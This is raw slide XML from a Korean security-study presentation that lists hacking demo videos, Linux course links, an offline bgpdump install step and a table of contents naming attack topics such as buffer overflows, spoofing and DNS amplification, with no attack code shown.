                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>해킹 시연</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rPr>
                        <a:t>https://www.youtube.com/watch?v=fDXQYezdcIQ</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err="1"/>
                        <a:t>Mysql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>취약점을 이용하여 공격자 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>pc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="100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err="1"/>
                        <a:t>웹해킹</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rPr>
                        <a:t>https://www.youtube.com/watch?v=MA6ugSrB8eY</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err="1"/>
                        <a:t>지뢰찾기</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="100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시스템 해킹</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rPr>
                        <a:t>https://www.youtube.com/watch?v=jZPudR4pWxM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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>스마트홈</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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네트워크 해킹</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a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>해킹 관련 영상</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rPr>
                        <a:t>https://www.youtube.com/watch?v=GisH2IQgob8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해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t> vs </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>해킹 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
                        <a:t>남과북</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="100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file"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=DkySqacKXlU</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사이버사령부 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>국방망</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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file"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=gmt_mmo30Js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북한 사이버테러 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>3.20 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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file"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=nfOLhuNwfI0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북한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7" action="ppaction://hlinkfile"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=CVDDmotEmvI</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사이버전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8"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=ynrsAtAlHqo</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북한의 엄청난 해킹능력 </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9"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=XGWP7v0OzTI</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0" action="ppaction://hlinkfile"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=o4dCzqy1JrY</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영화 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"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에니그마</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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1"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=IS3UpC121bI</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err="1"/>
                        <a:t>어나니머스</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t> 란 어떤 집단인가</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a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>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공부 사이트</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rPr>
                        <a:t>https://www.inflearn.com/course/%EC%9D%B4%EA%B2%83%EC%9D%B4-%EB%A6%AC%EB%88%85%EC%8A%A4%EB%8B%A4#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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>이것이 리눅스다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>' </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>저자의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Red Hat CentOS7 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>리눅스 서버</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" kern="120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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" kern="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>우재남</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 저자는 ‘초보자도 리눅스의 실무 기능을 막힘 없이 실습 가능하도록’ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>17</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>년간의 생생한 강의 경험을 이 책과 동영상에 담아냈습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="4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rPr>
                        <a:t>http://www.kocw.net/home/search/kemView.do?kemId=978503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a:t>운영체제 유명한 강좌 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>경성대학교</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/Environ/WSLOfflinePackageInstall</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  WSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>패키지 오프라인 설치</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(bgpdump)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://archive.ubuntu.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>원하는 패키지를 다운받는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>본 예시는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>bgpdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>이므로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://archive.ubuntu.com/ubuntu/pool/universe/b/bgpdump/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 이동하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>bgpdump_1.6.0-2_amd64.deb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 다운로드한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>우분투에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패키지를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다운로드한 경로에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 이용하여 들어간다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>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endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다음 명령어를 입력하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>bgpdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 설치한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dpkg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -i bgpdump_1.6.0-2_amd64.deb </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>4. bgpdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 쳐서 잘 설치되었는지 확인한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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ko-KR" altLang="en-US" sz="100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a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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/Tool</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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900"/>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VI </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>편집기</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rPr>
                        <a:t>Gdb</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err="1"/>
                        <a:t>Gdb</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
                        <a:t>디버거</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rPr>
                        <a:t>Tshark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604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Objdump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디어셈블러</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Objdump</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>) </a:t>
                      </a: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81220"/>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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>T1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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>T19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어셈블리어 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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버퍼 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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힙</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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포맷스트링</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(Format String Bug)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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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Condition)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9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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백도어</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(Backdoor)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10" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>T26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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>인젝션</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(injection)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T30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T31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1" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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hlinkClick r:id="rId12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>T32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DNS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>증폭 공격</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(DNS Amplification)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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>소니피쳐스</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>gdb</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a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>이론</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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81220"/>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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>T1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T19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T20</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T21</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T23</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어셈블리어 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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T24</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SSL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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버퍼 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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T26</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ARP Spoofing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힙</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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T27</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IP Spoofing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포맷스트링</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(Format String Bug)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T28</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DNS Spoofing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Condition)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T29</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SYN Flooding</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>백도어</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
